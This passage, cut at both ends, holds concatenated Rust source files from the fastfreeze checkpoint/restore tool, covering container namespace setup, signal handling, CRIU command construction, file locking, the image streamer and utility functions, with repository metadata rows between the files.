Err(e) => Err(e).context("lseek() failed")?, }; let new_fd = open(path, flags, Mode::empty()).context("open() failed")?; if let Some(pos) = pos { lseek64(new_fd, pos, Whence::SeekSet).context("lseek() failed")?; } dup2(new_fd, fd).context("dup2() failed")?; close(new_fd).context("close() failed")?; Ok(()) } for &fd in inheritable_fds { let path = if inheritable_tty_fds.contains(&fd) { PathBuf::from("/dev/pts/0") } else { readlink_fd(fd)? }; // Re-open files that are accessible from the file system. if path.starts_with("/") { reopen_fd(fd, &path) .with_context(|| format!("Failed to re-open {}", path.display()))?; } } Ok(()) } fn prepare_pty_namespace_and_reopen_fds() -> Result<()> { let fds = get_inheritable_fds()?; let tty_fds: Vec<_> = fds.iter().cloned().filter(|fd| is_term(*fd)).collect(); let tty_path = get_tty_path(&tty_fds)?; prepare_pty_namespace(tty_path.as_ref())?; reopen_fds(&fds, &tty_fds)?; Ok(()) } // PID namespace ////////////////////////////////// fn container_monitor_exit_process(monitor_child_result: Result<()>) -> ! { if let Err(e) = monitor_child_result { // Our child logs errors when exiting, so we skip logging in this case match e.downcast_ref::<ChildDied>() { Some(ChildDied::Exited(_)) => {}, _ => { log::error!("{:#}", e) }, } let exit_code = ExitCode::from_error(&e); std::process::exit(exit_code as i32); } std::process::exit(0); } fn write_container_pid_file(pid: Pid) -> Result<()> { fs::write(&*CONTAINER_PID, format!("{}\n", pid)) .with_context(|| format!("Failed to write to file {}", CONTAINER_PID.display())) } fn prepare_pid_namespace() -> Result<()> { unshare(CloneFlags::CLONE_NEWPID) .context("Failed to create PID namespace")?; if let ForkResult::Parent { child: container_pid } = fork()? { // We write down the container init process pid. It will be useful later // to entering the container when checkpointing (or with nsenter). // If we fail, we kill the container immediately. write_container_pid_file(container_pid) .map_err(|e| { let _ = kill(container_pid, signal::SIGKILL); e })?; let result = monitor_child(container_pid); cleanup_current_container(); container_monitor_exit_process(result); // unreachable } // We are now in the new PID namespace, as the init process // We can mount /proc because we have a root-mapped user namespace :) // This won't work if we are in a docker/kubernetes environment with a // protected /proc with a bunch of read-only subdirectory binds. let proc_mask = MsFlags::MS_NOSUID | MsFlags::MS_NODEV | MsFlags::MS_NOEXEC; mount(Some("proc"), "/proc", Some("proc"), proc_mask, None as Option<&str>) .context("Failed to mount /proc")?; if matches!(fs::OpenOptions::new().write(true).open("/proc/sys/kernel/ns_last_pid"), Err(e) if e.raw_os_error() == Some(libc::EACCES)) { warn!("WARN: /proc/sys/kernel/ns_last_pid is not writable, which can slow down restores. \ This can typically be fixed by upgrading your kernel. \ Another solution is to remap your uid to uid=0 in the container, which you can do \ by running fastfreeze with FF_FAKE_ROOT=1"); } Ok(()) } fn open_container_proc_dir(name: &str) -> Result<Option<fs::File>> { let inner = || -> Result<fs::File> { let pid_file_path = CONTAINERS_DIR.join(name).join("run/pid"); let pid = fs::read_to_string(&pid_file_path) .with_context(|| format!("Failed to read {}", pid_file_path.display()))?; let pid = pid.trim().parse::<u32>() .with_context(|| format!("Failed to parse {}", pid_file_path.display()))?; let proc_path = format!("/proc/{}", pid); let proc_file = fs::File::open(&proc_path) .with_context(|| format!("Failed to open {}", proc_path))?; Ok(proc_file) }; match inner() { Err(e) if e.downcast_ref::<std::io::Error>().map(|e| e.kind()) == Some(ErrorKind::NotFound) => Ok(None), Err(e) => Err(e), Ok(f) => Ok(Some(f)), } } pub fn get_running_containers() -> Result<Vec<String>> { // CONTAINERS_DIR may not exist, so we'll get NotFound errors. The code is a // little ugly because read_dir() can return errors, and entries can too. let containers = fs::read_dir(&*CONTAINERS_DIR) .and_then(|entries| entries .map(|name| name .map(|n| n.file_name().to_string_lossy().into_owned()) ).collect() ).or_else(|e| if e.kind() == ErrorKind::NotFound { Ok(vec![]) } else { Err(e) }) .with_context(|| format!("Failed to readdir {}", CONTAINERS_DIR.display()))?; let mut result = vec![]; for name in containers { if open_container_proc_dir(&name)?.is_some() { result.push(name); } } Ok(result) } pub fn create(name: &str) -> Result<()> { // First we check if the container is already running if open_container_proc_dir(name)?.is_some() { bail!("Error: The application `{}` is already running.\n\ Use `--app-name <name>` to specify a different name", name); } info!("Creating container for app named `{}`", name); prepare_user_namespace()?; prepare_fs_namespace(name)?; prepare_pty_namespace_and_reopen_fds()?; // The following forks and we become the init process of the container. We // prefer doing this compared to having the application being the init // process for the container because it matches the same hierachy that we // would have if we relied on kubernetes for creating our container. // fastfreeze is pid=1 in both cases. prepare_pid_namespace()?; Ok(()) } pub fn create_without_pid_ns() -> Result<()> { debug!("Creating a user and mount namespace to virtualize the system ELF loader"); prepare_user_namespace()?; prepare_fs_namespace_virt_install_only()?; prepare_pty_namespace_and_reopen_fds()?; Ok(()) } fn nsenter(name: &str) -> Result<()> { let container_proc_dir = open_container_proc_dir(name)? .ok_or_else(|| anyhow!("Error: The application `{}` is not running", name))?; // We relocate the log file in the container's log file directory. // This is helpful to preserve log files in checkpointed images. // We need to do this first, because once we enter the mount namespace, // we won't see the log file anymore. let private_ff_dir = CONTAINERS_DIR.join(name); logger::move_log_file(&private_ff_dir.join("logs"))?; let namespaces = [ ("ns/user", CloneFlags::CLONE_NEWUSER), ("ns/mnt", CloneFlags::CLONE_NEWNS), ("ns/pid", CloneFlags::CLONE_NEWPID) ]; for (ns_path, clone_flag) in &namespaces { let nsfile = openat(&container_proc_dir, ns_path)?; setns(&nsfile, *clone_flag)?; } raise_all_effective_caps_to_ambient()?; if let ForkResult::Parent { child: pid } = fork()? { let result = monitor_child(pid); container_monitor_exit_process(result); // unreachable } Ok(()) } fn nsenter_without_pid_ns() -> Result<()> { let namespaces = [ ("ns/user", CloneFlags::CLONE_NEWUSER), ("ns/mnt", CloneFlags::CLONE_NEWNS), ]; let container_proc_dir = fs::File::open(format!("/proc/{}", APP_ROOT_PID))?; for (ns_path, clone_flag) in &namespaces { let nsfile = openat(&container_proc_dir, ns_path)?; setns(&nsfile, *clone_flag)?; } raise_all_effective_caps_to_ambient()?; Ok(()) } fn maybe_nsenter_without_pid_ns() -> Result<()> { let current_user_ns = fs::read_link("/proc/self/ns/user") .context("Failed to readlink(/proc/self/ns/user)")?; let target_user_ns = fs::read_link(format!("/proc/{}/ns/user", APP_ROOT_PID)) .context("Failed to readlink(/proc/self/ns/user)")?; if current_user_ns != target_user_ns { nsenter_without_pid_ns()?; } Ok(()) } /// Enter the application container when the user provides us with its app name. /// If no container name is provided, we enter the container that we see running. /// If we see no containers, we'll see if an application is running outside of a /// proper container which is what happens with Docker/Kubernetes. pub fn maybe_nsenter_app(app_name: Option<&String>) -> Result<()> { if let Some(ref app_name) = app_name { ensure!(!app_name.is_empty(), "app_name is empty"); nsenter(app_name) } else { match get_running_containers()?.as_slice() { [] if is_app_running() => maybe_nsenter_without_pid_ns(), [] => bail!("Error: No application is running"), [single_container] => nsenter(single_container), names => { let formatted_names = names.iter() .map(|c| format!("* {}", c)) .collect::<Vec<_>>() .join("\n"); bail!("Multiple applications are running, so you must pick one.\n\ Re-run the same command with one of the following appended to the command\n{}", formatted_names); }, } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/signal.rs
src/signal.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ error::Error, fmt::Display, fs::File, io::{BufReader, ErrorKind}, path::Path, result::Result as StdResult, sync::atomic::{AtomicBool, Ordering} }; use std::io::prelude::*; use nix::{ sys::signal::{self, kill, Signal}, errno::Errno, unistd::Pid }; lazy_static! { static ref SIGTERM_RECEIVED: AtomicBool = AtomicBool::new(false); } pub fn trap_sigterm_and_friends() -> Result<()> { for signal in &[signal::SIGTERM, signal::SIGHUP, signal::SIGINT] { unsafe { // We cannot emit a log message in the signal handler as it // would be unsafe to allocate memory. signal_hook::low_level::register(*signal as i32, || SIGTERM_RECEIVED.store(true, Ordering::SeqCst))?; } } Ok(()) } #[derive(Debug)] pub struct TerminationRequestedError; impl Error for TerminationRequestedError {} impl Display for TerminationRequestedError { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Termination requested") } } /// Returns an error when a SIGTERM has been received. The signal is /// consumed, meaning that a subsequent call to `check_for_pending_sigterm()` /// will succeed unless another SIGTERM is received. pub fn check_for_pending_sigterm() -> Result<()> { if SIGTERM_RECEIVED.swap(false, Ordering::SeqCst) { info!("Termination requested"); bail!(TerminationRequestedError); } Ok(()) } pub trait IsErrorInterrupt { fn is_interrupt(&self) -> bool; } impl IsErrorInterrupt for nix::Error { fn is_interrupt(&self) -> bool { matches!(&self, Self::Sys(errno) if *errno == Errno::EINTR) } } impl IsErrorInterrupt for std::io::Error { fn is_interrupt(&self) -> bool { self.kind() == ErrorKind::Interrupted } } impl IsErrorInterrupt for anyhow::Error { fn is_interrupt(&self) -> bool { match self.downcast_ref::<nix::Error>() { Some(e) if e.is_interrupt() => return true, _ => {} } match self.downcast_ref::<std::io::Error>() { Some(e) if e.is_interrupt() => return true, _ => {} } false } } pub fn retry_on_interrupt<R,E>(mut f: impl FnMut() -> StdResult<R,E>) -> StdResult<R,E> where E: IsErrorInterrupt { loop { match f() { Err(e) if e.is_interrupt() => {} other => return other, } } } fn get_children(pid: Pid) -> Result<Vec<Pid>> { let task_dir = Path::new("/proc").join(pid.to_string()).join("task"); let mut children_str = String::new(); // We are okay to fail to open the task directory. That would mean that the // task just disappeared. if let Ok(task_dir_reader) = task_dir.read_dir() { for task_entry in task_dir_reader { // The children file ends with a space, and no new line, making it // suitable to read repeatedly, and append the content in a single string buffer. // Note: We tolerate open failures as the child may disappear. if let Ok(mut file) = File::open(task_entry?.path().join("children")) { file.read_to_string(&mut children_str)?; } } } Ok(children_str.trim().split_whitespace() .map(|pid| Pid::from_raw(pid.parse::<i32>().expect("non-numeric pid"))) .collect()) } fn get_process_tree(root_pid: Pid) -> Result<Vec<Pid>> { fn get_process_tree_inner(pid: Pid, pids: &mut Vec<Pid>) -> Result<()> { pids.push(pid); for child in get_children(pid)? { get_process_tree_inner(child, pids)?; } Ok(()) } let mut pids = Vec::new(); get_process_tree_inner(root_pid, &mut pids)?; Ok(pids) } /// Kill an entire process group. It is not atomic. /// Tasks may appear while we are traversing the tree. /// This is mostly used to SIGSTOP/SIGCONT the entire application. /// TODO We could use the cgroup freezer if we have access to it. pub fn kill_process_tree(root_pid: Pid, signal: Signal) -> Result<()> { for pid in get_process_tree(root_pid)? { // We ignore kill errors as process may disappear. // It's not really satisfactory, but I'm not sure if we can do better. let _ = kill(pid, signal); } Ok(()) } pub fn get_proc_state(pid: Pid) -> Result<char> { let status_path = Path::new("/proc").join(pid.to_string()).join("status"); let status_file = File::open(status_path)?; for line in BufReader::new(status_file).lines() { // lines are of the format "Key:\tValue" // We are looking for the state line "State: R (running)" if let [key, value] = *line?.split(":\t").collect::<Vec<_>>() { if key == "State" { return Ok(value.chars().next().expect("proc status file corrupted")); } } } bail!("Failed to parse proc status file"); }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/criu.rs
src/criu.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ collections::{HashSet, HashMap}, os::unix::io::RawFd, }; use serde::{Serialize, Deserialize}; use crate::{ consts::*, process::Command, util::{get_inheritable_fds, readlink_fd, is_term}, }; // Say the application was originally run with "fastfreeze run app | cat". // It started with a pipe as stdout. The application may have had duped its fds over its lifetime. // When we restore, with the same command, we want to replace the occurances of the old // pipe with the new one. To do so, we need to remember the original pipe inode // and replace all occurrences of it with the new stdout that we are running // with. That's where the CRIU --inherit-fd option helps us with. It replaces // all occurrences of a given resource with a specific fd. // The `InheritableResources` struct helps us with doing all this. #[derive(Serialize, Deserialize)] pub struct InheritableResources(pub HashMap<String, Vec<RawFd>>); impl InheritableResources { /// Returns the list of inheritable resources. These are resources that the application /// gains access to, for example a stdout connected to a pipe that has been created outside /// of the app container. Regular files don't count as they are accessible from /// the application container, and do not need special handling. /// Each resource comes with a list of associated file descriptors. pub fn current() -> Result<Self> { let mut resources: HashMap<String, Vec<RawFd>> = HashMap::new(); for fd in get_inheritable_fds()? { let res_name = readlink_fd(fd)?.to_string_lossy().into_owned(); if let Some(fds) = resources.get_mut(&res_name) { fds.push(fd); } else { resources.insert(res_name, vec![fd]); } } // CRIU refers to terminal as tty:[rdev:dev], not /dev/pts/0, so we'll // rename the resource name in this case. let resources: HashMap<String, Vec<RawFd>> = resources.into_iter() .map(|(res_name, fds)| if is_term(fds[0]) { // expect() here is okay. If fstat() fails, something terrible must have happened. let stat = nix::sys::stat::fstat(fds[0]).expect("fstat failed"); (format!("tty[{:x}:{:x}]", stat.st_rdev, stat.st_dev), fds) } else { (res_name, fds) } ).collect(); for (res_name, fds) in resources.iter() { debug!("Application inherits {} via fd:{:?}", res_name, fds); } Ok(Self(resources)) } pub fn compatible_with(&self, other: &Self) -> bool { let a_fds: HashSet<_> = self.0.values().collect(); let b_fds: HashSet<_> = other.0.values().collect(); a_fds == b_fds } pub fn add_remaps_criu_opts(&self, criu_cmd: &mut Command) { for (res_name, fds) in &self.0 { // We have a resource that can be opened via multiple fds. // It doesn't matter which one we take. CRIU reopens the fd // correctly anyways through /proc/self/fd/N. let mut fd = fds.iter().cloned().next().expect("missing resource fd"); if fd == libc::STDERR_FILENO { // Here's a bit of a problem. CRIU is getting a redirected pipe // for stderr so we can buffer its output in run.rs via // enable_stderr_logging. That means that we can't export the // original stderr on fd=2. We are going to use another one. // // TODO close that file descriptor once we have forked the CRIU // command. fd = nix::unistd::dup(fd).expect("dup() failed"); } criu_cmd .arg("--inherit-fd") .arg(format!("fd[{}]:{}", fd, res_name)); } } } // CRIU is running under our CPUID virtualization. // The CPUID that it detects is virtualized. pub fn criu_dump_cmd() -> Command { let mut cmd = Command::new(&[ "criu", "dump", "--tree", &APP_ROOT_PID.to_string(), "--leave-stopped", // Leave app stopped: we resume app once the filesystem is tarred. // The rest are some networking options. In a nutshell, we want all // external connections to be closed on restore. "--empty-ns", "net", "--tcp-established", "--skip-in-flight", "--tcp-close", "--ext-unix-sk" ]); add_common_criu_opts(&mut cmd); cmd } pub fn criu_restore_cmd( leave_stopped: bool, previously_inherited_resources: &InheritableResources, ) -> Command { let mut cmd = Command::new(&[ "criu", "restore", "--restore-sibling", "--restore-detached", // Become parent of the app (CLONE_PARENT) // The rest are some networking options. In a nutshell, we want all // external connections to be closed on restore. "--tcp-close", "--ext-unix-sk", ]); if leave_stopped { cmd.arg("--leave-stopped"); } add_common_criu_opts(&mut cmd); previously_inherited_resources .add_remaps_criu_opts(&mut cmd); cmd } fn add_common_criu_opts(cmd: &mut Command) { cmd.arg("--images-dir").arg(&*CRIU_SOCKET_DIR); cmd.args(&[ "--cpu-cap", // Save and check CPUID information in the image "--shell-job", // Support attached TTYs "--file-locks", // Support file locks // CRIU has an experimental feature for checking file integrity. // It can read the build-id in ELF headers during dump, and compare it during restore. // Currently, it emits warnings during dump. So we'll skip it for now. "--file-validation", "filesize", "--stream", // Use criu-image-streamer ]); if log_enabled!(log::Level::Trace) { cmd.arg("-v"); // verbose cmd.arg("--display-stats"); } let extra_opts = std::env::var_os("CRIU_OPTS").unwrap_or_default(); cmd.args(extra_opts.to_str() .expect("CRIU_OPTS is UTF8 malformed") .split_whitespace()); } pub fn criu_check_cmd() -> Command { Command::new(&["criu", "check"]) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/lock.rs
src/lock.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::AsRawFd, time::{Instant, Duration}, path::Path, fs, }; use nix::{ Error, errno::Errno, fcntl::{flock, FlockArg} }; use crate::{ consts::*, signal::check_for_pending_sigterm, }; #[must_use = "if unused, the lock will immediately unlock"] /// When `FileLockGuard` is dropped, the corresponding `fs::File` is closed, unlocking the file. pub struct FileLockGuard(fs::File); #[derive(Debug)] struct LockTimeoutError; impl std::error::Error for LockTimeoutError {} impl std::fmt::Display for LockTimeoutError { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Lock timeout exeeded") } } pub fn file_lock(path: &Path, timeout: Option<Instant>, exclusive: bool) -> Result<FileLockGuard> { // Instead of using alarm() to support timeout, we use the non-blocking // version of flock to avoid races. let flag = match (timeout.is_some(), exclusive) { (true, true) => FlockArg::LockExclusiveNonblock, (true, false) => FlockArg::LockSharedNonblock, (false, true) => FlockArg::LockExclusive, (false, false) => FlockArg::LockShared, }; let file = fs::File::create(path) .with_context(|| format!("Failed to create lock file {}", path.display()))?; trace!("Waiting to acquire file lock at {}", path.display()); loop { check_for_pending_sigterm()?; match (flock(file.as_raw_fd(), flag), timeout.as_ref()) { (Err(Error::Sys(Errno::EAGAIN)), Some(timeout)) => { ensure!(Instant::now() < *timeout, LockTimeoutError); std::thread::sleep(Duration::from_millis(100)); }, (Err(Error::Sys(Errno::EINTR)), _) => {}, (Err(e), _) => bail!(e), (Ok(_), _) => break, } } Ok(FileLockGuard(file)) } pub fn checkpoint_restore_lock(timeout: Option<Instant>, exclusive: bool) -> Result<FileLockGuard> { file_lock(&*LOCK_FILE_PATH, timeout, exclusive).map_err(|e| match e.downcast::<LockTimeoutError>() { Ok(_) => anyhow!("Previous checkpoint/restore operation still in progress"), Err(e) => e, } ) } pub fn with_checkpoint_restore_lock<F,R>(f: F) -> Result<R> where F: FnOnce() -> Result<R>, { let _lock_guard = { // We use a 1 second timeout because we could be racing with a "fastfreeze // wait" command, which holds the lock for a tiny amount of time. Otherwise, // we would use 0 timeout. let timeout = Some(Instant::now() + Duration::from_secs(1)); checkpoint_restore_lock(timeout, true)? }; f() }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image_streamer.rs
src/image_streamer.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::{RawFd, AsRawFd}, fs, io::BufReader, io::BufRead, io::Lines, path::Path, }; use serde::{Serialize, Deserialize}; use crate::{ consts::*, util::Pipe, process::{Command, Process, PipeCommandExt}, }; pub struct Progress { pub fd: RawFd, pub lines: Lines<BufReader<fs::File>>, } impl Progress { fn get_next_progress_line(&mut self) -> Result<String> { Ok(self.lines.next() .ok_or_else(|| anyhow!("EOF unexpectedly reached")) .context("Failed to read progress from the streamer")??) } pub fn wait_for_socket_init(&mut self) -> Result<()> { ensure!(self.get_next_progress_line()? == "socket-init", "criu-image-streamer failed to initialize"); Ok(()) } pub fn wait_for_checkpoint_start(&mut self) -> Result<()> { ensure!(self.get_next_progress_line()? == "checkpoint-start", "criu-image-streamer failed to send start message"); Ok(()) } pub fn wait_for_stats(&mut self) -> Result<Stats> { let stats_json = self.get_next_progress_line()?; Ok(serde_json::from_str::<ImageStreamerStats>(&stats_json)?.into()) } } pub struct ImageStreamer { pub process: Process, pub progress: Progress, pub tar_fs_pipe: Option<fs::File>, pub shard_pipes: Vec<fs::File>, } impl ImageStreamer { pub fn spawn_capture(num_shards: usize) -> Result<Self> { let progress = Pipe::new_output()?; let fs_tar = Pipe::new_input()?; let shards = (0..num_shards) .map(|_| Pipe::new_output()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--ext-file-fds", &format!("fs.tar:{}", fs_tar.read.as_raw_fd()), "--shard-fds", &shards.iter() .map(|o| o.write.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), ]); cmd .arg("--images-dir").arg(&*CRIU_SOCKET_DIR) .arg("capture") .enable_stderr_logging("streamer"); Ok(Self { process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: Some(fs_tar.write), shard_pipes: shards.into_iter().map(|o| o.read).collect(), }) } pub fn spawn_serve(num_shards: usize, tcp_listen_remaps: Vec<String>) -> Result<Self> { let progress = Pipe::new_output()?; let fs_tar = Pipe::new_output()?; let shards = (0..num_shards) .map(|_| Pipe::new_input()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--ext-file-fds", &format!("fs.tar:{}", fs_tar.write.as_raw_fd()), "--shard-fds", &shards.iter() .map(|o| o.read.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), ]); if !tcp_listen_remaps.is_empty() { cmd.arg("--tcp-listen-remap").arg(&tcp_listen_remaps.join(",")); } cmd .arg("--images-dir").arg(&*CRIU_SOCKET_DIR) .arg("serve") .enable_stderr_logging("streamer"); Ok(Self { process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: Some(fs_tar.read), shard_pipes: shards.into_iter().map(|o| o.write).collect(), }) } pub fn spawn_extract(num_shards: usize, output_dir: &Path) -> Result<Self> { let progress = Pipe::new_output()?; let shards = (0..num_shards) .map(|_| Pipe::new_input()) .collect::<Result<Vec<_>>>()?; let mut cmd = Command::new(&[ "criu-image-streamer", "--progress-fd", &progress.write.as_raw_fd().to_string(), "--shard-fds", &shards.iter() .map(|o| o.read.as_raw_fd().to_string()) .collect::<Vec<_>>().join(","), "--images-dir" ]); cmd.arg(output_dir) .arg("extract") .enable_stderr_logging("streamer"); Ok(Self { process: cmd.spawn()?, progress: Progress { fd: progress.read.as_raw_fd(), lines: BufReader::new(progress.read).lines(), }, tar_fs_pipe: None, shard_pipes: shards.into_iter().map(|o| o.write).collect(), }) } } #[derive(Serialize, Deserialize)] pub struct ImageStreamerStats { pub shards: Vec<ImageStreamerShardStat>, } #[derive(Serialize, Deserialize)] pub struct ImageStreamerShardStat { pub size: u64, pub transfer_duration_millis: u128, } // These are emitted for metrics #[derive(Serialize, Deserialize)] pub struct Stats { pub total_size_mb: f64, pub total_duration_sec: f64, pub rate_mb_per_sec: f64, pub shards: Vec<ShardStat>, } #[derive(Serialize, Deserialize)] pub struct ShardStat { pub size_mb: f64, pub duration_sec: f64, pub rate_mb_per_sec: f64, } impl Stats { pub fn show(&self) { info!("Uncompressed image size is {:.0} MiB, rate: {:.0} MiB/s", self.total_size_mb, self.rate_mb_per_sec); if log_enabled!(log::Level::Debug) && self.shards.len() > 1 { for (i, shard) in self.shards.iter().enumerate() { debug!(" Shard {}: {:.0} MiB, rate: {:.0} MiB/s", i+1, shard.size_mb, shard.rate_mb_per_sec); } } // To show the compressed rates, we need to examine the output pipes. // But that will cost us some CPU overhead as there's no way to get // stats on a kernel pipe, to my knowledge. } } impl From<ImageStreamerStats> for Stats { fn from(stats: ImageStreamerStats) -> Self { let total_size: u64 = stats.shards.iter().map(|s| s.size).sum(); let total_duration_millis = stats.shards.iter().map(|s| s.transfer_duration_millis).max().unwrap_or(0); let total_size_mb = total_size as f64 / MB as f64; let total_duration_sec = total_duration_millis as f64 / 1000.0; let rate_mb_per_sec = if total_duration_sec == 0.0 { 0.0 } else { total_size_mb / total_duration_sec }; let shards = stats.shards.into_iter().map(|s| { let size_mb = s.size as f64 / MB as f64; let duration_sec = s.transfer_duration_millis as f64 / 1000.0; let rate_mb_per_sec = if duration_sec == 0.0 { 0.0 } else { size_mb / duration_sec }; ShardStat { size_mb, duration_sec, rate_mb_per_sec } }).collect::<Vec<_>>(); Self { total_size_mb, total_duration_sec, rate_mb_per_sec, shards } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/util.rs
src/util.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::{RawFd, AsRawFd, FromRawFd}, path::{PathBuf, Path}, env, ffi::OsString, fs::{self, Permissions}, os::unix::fs::PermissionsExt, io::prelude::*, io::SeekFrom, }; use nix::{ fcntl::{fcntl, FcntlArg, FdFlag, OFlag}, poll::{poll, PollFd}, sched::CloneFlags, sys::stat::Mode, sys::uio::pwrite, unistd::pipe2 }; use crate::{ consts::*, signal::{IsErrorInterrupt, retry_on_interrupt}, }; use serde_json::Value; use rand::{thread_rng, Rng, distributions::Alphanumeric}; use url::Url; pub fn gen_random_alphanum_string(len: usize) -> String { thread_rng() .sample_iter(&Alphanumeric) .take(len) .collect() } // This is essentially what stream_len() does in the std lib, but it is // unstable. We use this in the meantime. pub fn get_file_size(file: &mut fs::File) -> Result<u64> { let old_pos = file.seek(SeekFrom::Current(0))?; let len = file.seek(SeekFrom::End(0))?; if old_pos != len { file.seek(SeekFrom::Start(old_pos))?; } Ok(len) } pub fn get_inheritable_fds() -> Result<Vec<RawFd>> { || -> Result<Vec<RawFd>> { let mut result = vec![]; for entry in fs::read_dir("/proc/self/fd")? { let fd = entry?.file_name().to_string_lossy().parse()?; let fd_flags = fcntl(fd, FcntlArg::F_GETFD)?; let fd_flags = FdFlag::from_bits_truncate(fd_flags); if !fd_flags.contains(FdFlag::FD_CLOEXEC) { result.push(fd); } } Ok(result) }().context("Failed to enumerate file descriptors") } pub fn readlink_fd(fd: RawFd) -> Result<PathBuf> { let path = format!("/proc/self/fd/{}", fd); fs::read_link(&path) .with_context(|| format!("Failed to readlink {}", &path)) } pub fn is_term(fd: RawFd) -> bool { nix::sys::termios::tcgetattr(fd).is_ok() } pub fn pwrite_all(file: &fs::File, buf: &[u8], offset: i64) -> Result<()> { let mut buf_off = 0; while buf_off < buf.len() { let file_offset = offset.checked_add(buf_off as i64).expect("File offset overflown"); let written = retry_on_interrupt(|| pwrite(file.as_raw_fd(), &buf[buf_off..], file_offset) )?; buf_off += written; } Ok(()) } pub fn poll_nointr(fds: &mut [PollFd], timeout: libc::c_int) -> nix::Result<libc::c_int> { match poll(fds, timeout) { Err(e) if e.is_interrupt() => Ok(0), result => result, } } pub struct Pipe { pub read: fs::File, pub write: fs::File, } impl Pipe { pub fn new(flags: OFlag) -> Result<Self> { let (fd_r, fd_w) = pipe2(flags).context("Failed to create a pipe")?; let read = unsafe { fs::File::from_raw_fd(fd_r) }; let write = unsafe { fs::File::from_raw_fd(fd_w) }; Ok(Self { read, write }) } } pub fn create_dir_all(path: impl AsRef<Path>) -> Result<()> { fs::create_dir_all(path.as_ref()) .with_context(|| format!("Failed to create directory {}", path.as_ref().display())) } pub fn copy_file(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<u64> { fs::copy(from.as_ref(), to.as_ref()) .with_context(|| format!("Failed to copy file {} to {}", from.as_ref().display(), to.as_ref().display())) } pub fn openat(path: &fs::File, filename: impl AsRef<Path>) -> Result<fs::File> { let fd = nix::fcntl::openat(path.as_raw_fd(), filename.as_ref(), OFlag::O_RDONLY, Mode::empty()) .with_context(|| format!("Failed to open {}", filename.as_ref().display()))?; unsafe { Ok(fs::File::from_raw_fd(fd)) } } pub fn setns(nsfile: &fs::File, flag: CloneFlags) -> Result<()> { let res = unsafe { libc::setns(nsfile.as_raw_fd(), flag.bits()) }; nix::errno::Errno::result(res) .with_context(|| format!("Failed to enter namespace. setns({:?}) failed", flag)) .map(drop) } // TODO DELETE pub fn cap_ambient_raise(cap: u32) -> Result<()> { let res = unsafe { libc::prctl(libc::PR_CAP_AMBIENT, libc::PR_CAP_AMBIENT_RAISE, cap, 0, 0) }; 